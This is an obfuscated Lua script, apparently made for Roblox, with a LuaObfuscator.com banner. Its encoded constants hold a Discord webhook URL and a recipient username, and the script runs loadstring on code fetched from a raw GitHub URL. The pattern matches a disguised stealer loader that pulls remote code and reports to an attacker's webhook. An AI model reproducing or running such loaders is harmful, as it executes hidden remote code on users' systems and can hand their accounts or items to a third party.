--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v100=v5(v70,v19);v19=nil;return v100;else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -(1 + 2))^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v71-(v71%(932 -(857 + (951 -(282 + 595))))) ;else local v72=((2207 -(1523 + 114)) -(330 + 37 + 201))^(v32-1) ;return (((v31%(v72 + v72))>=v72) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==((1045 + 21) -(68 + 997))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=118 -(32 + 85) ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(351 -(87 + 263))) then return (v38 * (1213 -(892 + 65))) + v37 ;end if (v36==((0 -0) -0)) then v37,v38=v1(v16,v18,v18 + (3 -(953 -(802 + 150))) );v18=v18 + 2 ;v36=1 + 0 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;return (v42 * (12211951 + 4565265)) + (v41 * (66533 -(915 + 48 + 34))) + (v40 * (724 -468)) + v39 ;end local function v24()local v43=0 -(0 + 0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(12 -9)) then if (v48==(1187 -(1069 + 118))) then if (v47==(0 -0)) then return v49 * (0 -0) ;else v48=1 + 0 ;v46=0 -0 ;end elseif (v48==(3636 -1589)) then return ((v47==((1914 -(87 + 968)) -(814 + 45))) and (v49 * ((1 + 0)/(791 -(368 + 423))))) or (v49 * NaN) ;end return v8(v49,v48-(4503 -3480) ) * (v46 + (v47/((6 -4)^(70 -(10 + (1421 -(447 + 966))))))) ;end if (v43==(7 -(13 -8))) then v48=v20(v45,37 -16 ,473 -(416 + 24 + 2) );v49=((v20(v45,1455 -(630 + 793) )==(3 -2)) and  -(1 + 0)) or ((1821 -(1703 + 114)) -3) ;v43=(703 -(376 + 325)) + 1 ;end if (v43==(3 -2)) then v46=1 -0 ;v47=(v20(v45,439 -(145 + 293) ,(737 -287) -(44 + (1187 -801)) ) * ((1488 -(998 + 488))^(11 + 21))) + v44 ;v43=2 + 0 + 0 ;end if (v43==(772 -((442 -241) + 571))) then v44=v23();v45=v23();v43=(1153 -(9 + 5)) -((262 -146) + 1022) ;end end end local function v25(v50)local v51=376 -(85 + 291) ;local v52;local v53;while true do if (v51==(1267 -(34 + 209 + 1022))) then v53={};for v79=3 -(2 -0) , #v52 do v53[v79]=v2(v1(v3(v52,v79,v79)));end v51=3 + (0 -0) ;end if ((1181 -(1123 + 57))==v51) then v52=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;v51=256 -(163 + 91) ;end if (v51==(1930 -(1869 + 58 + 3))) then v52=nil;if  not v50 then v50=v23();if (v50==((1474 -(1329 + 145)) + 0)) then return "";end end v51=1;end if (v51==(10 -7)) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0 -0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==2) then v59=nil;v60=nil;v54=1 + 2 ;end if (v54==(1322 -(1249 + 73))) then local v73=0;local v74;while true do if (v73==0) then v74=0 + 0 ;while true do if (0~=v74) then else v55=1145 -(466 + 679) ;v56=nil;v74=2 -1 ;end if (v74~=1) then else v54=1;break;end end break;end end end if ((8 -5)==v54) then v61=nil;while true do local v81=0;local v82;while true do if (v81==0) then v82=0;while true do if (v82~=(1901 -(106 + 1794))) then else if (v55~=(0 + 0)) then else local v108=0;local v109;while true do if (v108~=(0 + 0)) then else v109=0 -0 ;while true do if (v109==(2 -1)) then local v145=114 -(4 + 110) ;while true do if (v145~=(584 -(57 + 527))) then else local v179=0;while true do if (1~=v179) then else v145=1;break;end if (0==v179) then v58={};v59={v56,v57,nil,v58};v179=104 -(17 + 86) ;end end end if (v145~=1) then else v109=2;break;end end end if (v109==(0 + 0)) then local v146=0;while true do if (v146~=(1 -0)) then else v109=2 -1 ;break;end if (v146==(166 -(122 + 44))) then local v180=0;while true do if (v180==(1 -0)) then v146=1;break;end if (v180~=(0 -0)) then else v56={};v57={};v180=1;end end end end end if (v109==(2 + 0)) then v55=1 + 0 ;break;end end break;end end end break;end if (0==v82) then local v107=0;while true do if (v107==1) then v82=1 -0 ;break;end if (v107~=(65 -(30 + 35))) then else if (v55==(2 + 0)) then local v118=1257 -(1043 + 214) ;while true do local v123=0 -0 ;while true do if (v123==(1212 -(323 + 889))) then if (v118~=(2 -1)) then else return v59;end if (v118~=(580 -(361 + 219))) then else local v181=320 -(53 + 267) ;while true do if (v181~=(1 + 0)) then else v118=1;break;end if (v181~=(413 -(15 + 398))) then else local v184=0;while true do if (v184==(982 -(18 + 964))) then for v186=1,v23() do local v187=0 -0 ;local v188;while true do if (v187==(0 + 0)) then v188=v21();if (v20(v188,1 + 0 ,851 -(20 + 830) )==0) then local v198=0 + 0 ;local v199;local v200;local v201;local v202;while true do if (v198~=2) then else while true do if ((126 -(116 + 10))~=v199) then else local v204=0;while true do if (v204~=(0 + 0)) then else v200=v20(v188,740 -(542 + 196) ,6 -3 );v201=v20(v188,2 + 2 ,6);v204=1;end if (v204~=1) then else v199=1;break;end end end if (3==v199) then if (v20(v201,2 + 1 ,2 + 1 )==1) then v202[4]=v61[v202[10 -6 ]];end v56[v186]=v202;break;end if (v199==(2 -1)) then local v206=1551 -(1126 + 425) ;while true do if ((405 -(118 + 287))~=v206) then else v202={v22(),v22(),nil,nil};if (v200==0) then local v214=377 -(142 + 235) ;local v215;while true do if (v214~=0) then else v215=0;while true do if (v215==(0 -0)) then v202[1 + 2 ]=v22();v202[4]=v22();break;end end break;end end elseif (v200==1) then v202[3]=v23();elseif (v200==2) then v202[980 -(553 + 424) ]=v23() -((3 -1)^16) ;elseif (v200==(3 + 0)) then local v225=0 + 0 ;local v226;while true do if (v225~=(0 + 0)) then else v226=0 + 0 ;while true do if (v226==0) then v202[2 + 1 ]=v23() -((4 -2)^(44 -28)) ;v202[8 -4 ]=v22();break;end end break;end end end v206=1;end if (v206==1) then v199=1 + 1 ;break;end end end if ((9 -7)~=v199) then else local v207=0;while true do if (v207~=1) then else v199=756 -(239 + 514) ;break;end if (0==v207) then if (v20(v201,1,1)~=(1 + 0)) then else v202[2]=v61[v202[1331 -(797 + 532) ]];end if (v20(v201,2 + 0 ,1 + 1 )~=(2 -1)) then else v202[1205 -(373 + 829) ]=v61[v202[3]];end v207=732 -(476 + 255) ;end end end end break;end if (v198~=1) then else v201=nil;v202=nil;v198=2;end if (v198~=(1130 -(369 + 761))) then else v199=0 + 0 ;v200=nil;v198=1;end end end break;end end end for v189=1 -0 ,v23() do v57[v189-1 ]=v28();end v184=1 -0 ;end if (v184~=(239 -(64 + 174))) then else v181=1 + 0 ;break;end end end end end break;end end end end if (v55~=1) then else local v119=0;local v120;while true do if (v119==(0 -0)) then v120=336 -(144 + 192) ;while true do if (v120~=(217 -(42 + 174))) then else local v182=0 + 0 ;local v183;while true do if (v182~=0) then else v183=0;while true do if (v183==(1 + 0)) then v120=2;break;end if ((0 + 0)~=v183) then else local v185=0;while true do if (v185==(1505 -(363 + 1141))) then v183=1581 -(1183 + 397) ;break;end if (v185~=(0 -0)) then else for v192=1,v60 do local v193=0 + 0 ;local v194;local v195;local v196;local v197;while true do if (v193~=(0 + 0)) then else v194=0;v195=nil;v193=1;end if (v193~=(1976 -(1913 + 62))) then else v196=nil;v197=nil;v193=2 + 0 ;end if (v193~=(5 -3)) then else while true do if (1==v194) then v197=nil;while true do if (v195~=(1933 -(565 + 1368))) then else local v208=0;local v209;while true do if (v208~=(0 -0)) then else v209=0;while true do if (v209==1) then v195=1662 -(1477 + 184) ;break;end if (v209==0) then local v221=0;while true do if (v221==1) then v209=1 -0 ;break;end if (v221~=0) then else v196=v21();v197=nil;v221=1 + 0 ;end end end end break;end end end if (v195==(857 -(564 + 292))) then if (v196==(1 -0)) then v197=v21()~=(0 -0) ;elseif (v196==2) then v197=v24();elseif (v196~=3) then else v197=v25();end v61[v192]=v197;break;end end break;end if (v194==(304 -(244 + 60))) then local v203=0 + 0 ;while true do if (1==v203) then v194=1;break;end if (v203~=(476 -(41 + 435))) then else local v211=0;while true do if (v211==(1001 -(938 + 63))) then v195=0;v196=nil;v211=1 + 0 ;end if ((1126 -(936 + 189))==v211) then v203=1 + 0 ;break;end end end end end end break;end end end v59[1616 -(1565 + 48) ]=v21();v185=1;end end end end break;end end end if (v120~=(0 + 0)) then else v60=v23();v61={};v120=1;end if (v120~=(1140 -(782 + 356))) then else v55=2;break;end end break;end end end v107=1;end end end end break;end end end break;end if (v54==(268 -(176 + 91))) then local v75=0 -0 ;while true do if (0~=v75) then else local v99=0 -0 ;while true do if (v99~=0) then else v57=nil;v58=nil;v99=1;end if (v99~=1) then else v75=1093 -(975 + 117) ;break;end end end if (v75~=(1876 -(157 + 1718))) then else v54=2;break;end end end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v83=v66;local v84=v67;local v85=v68;local v86=v27;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==1) then if (v96<=5) then if (v96<=2) then if (v96<=0) then v93[v95[2]][v95[3]]=v95[4];elseif (v96>1) then local v124=0;local v125;local v126;while true do if (v124==0) then v125=v95[2];v126=v93[v95[3]];v124=1;end if (v124==1) then v93[v125 + 1 ]=v126;v93[v125]=v126[v95[4]];break;end end else do return;end end elseif (v96<=3) then v93[v95[2]]=v64[v95[3]];elseif (v96>4) then v93[v95[2]]=v95[3];else v93[v95[2]]();end elseif (v96<=8) then if (v96<=6) then local v114=v95[2];local v115,v116=v86(v93[v114](v13(v93,v114 + 1 ,v95[3])));v88=(v116 + v114) -1 ;local v117=0;for v121=v114,v88 do local v122=0;while true do if (v122==0) then v117=v117 + 1 ;v93[v121]=v115[v117];break;end end end elseif (v96==7) then v87=v95[3];else local v130=0;local v131;local v132;local v133;local v134;local v135;while true do if (1==v130) then v95=v83[v87];v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v130=2;end if (v130==5) then v87=v87 + 1 ;v95=v83[v87];v135=v95[2];v93[v135]=v93[v135](v13(v93,v135 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v130=6;end if (v130==0) then v131=nil;v132,v133=nil;v134=nil;v135=nil;v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v130=1;end if (v130==3) then v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v130=4;end if (v130==4) then v95=v83[v87];v135=v95[2];v132,v133=v86(v93[v135](v13(v93,v135 + 1 ,v95[3])));v88=(v133 + v135) -1 ;v131=0;for v176=v135,v88 do v131=v131 + 1 ;v93[v176]=v132[v131];end v130=5;end if (v130==6) then v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v87=v95[3];break;end if (v130==2) then v95=v83[v87];v135=v95[2];v134=v93[v95[3]];v93[v135 + 1 ]=v134;v93[v135]=v134[v95[4]];v87=v87 + 1 ;v130=3;end end end elseif (v96<=10) then if (v96==9) then v93[v95[2]]=v95[3]~=0 ;else v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v64[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v87=v95[3];end elseif (v96>11) then if (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end else local v143=v95[2];v93[v143]=v93[v143](v13(v93,v143 + 1 ,v88));end v87=v87 + 1 ;break;end if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F4O314O3932393238303336343534352F5830423530634D4A37666E2O5567617763675A446E386B4E42312D6B4438394A7A617677427243345F565F43524C496F5664524A694A474F342D655032594E6F4C324149030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D65030C3O00747261667468656F70656E3003093O00557365724E616D653200173O0012053O00013O00260C3O000E000100020004073O000E0001001203000100033O00300800010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O0016000100260C3O0001000100010004073O00010001001203000100033O00300A0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00013O00017O00",v9(),...);end
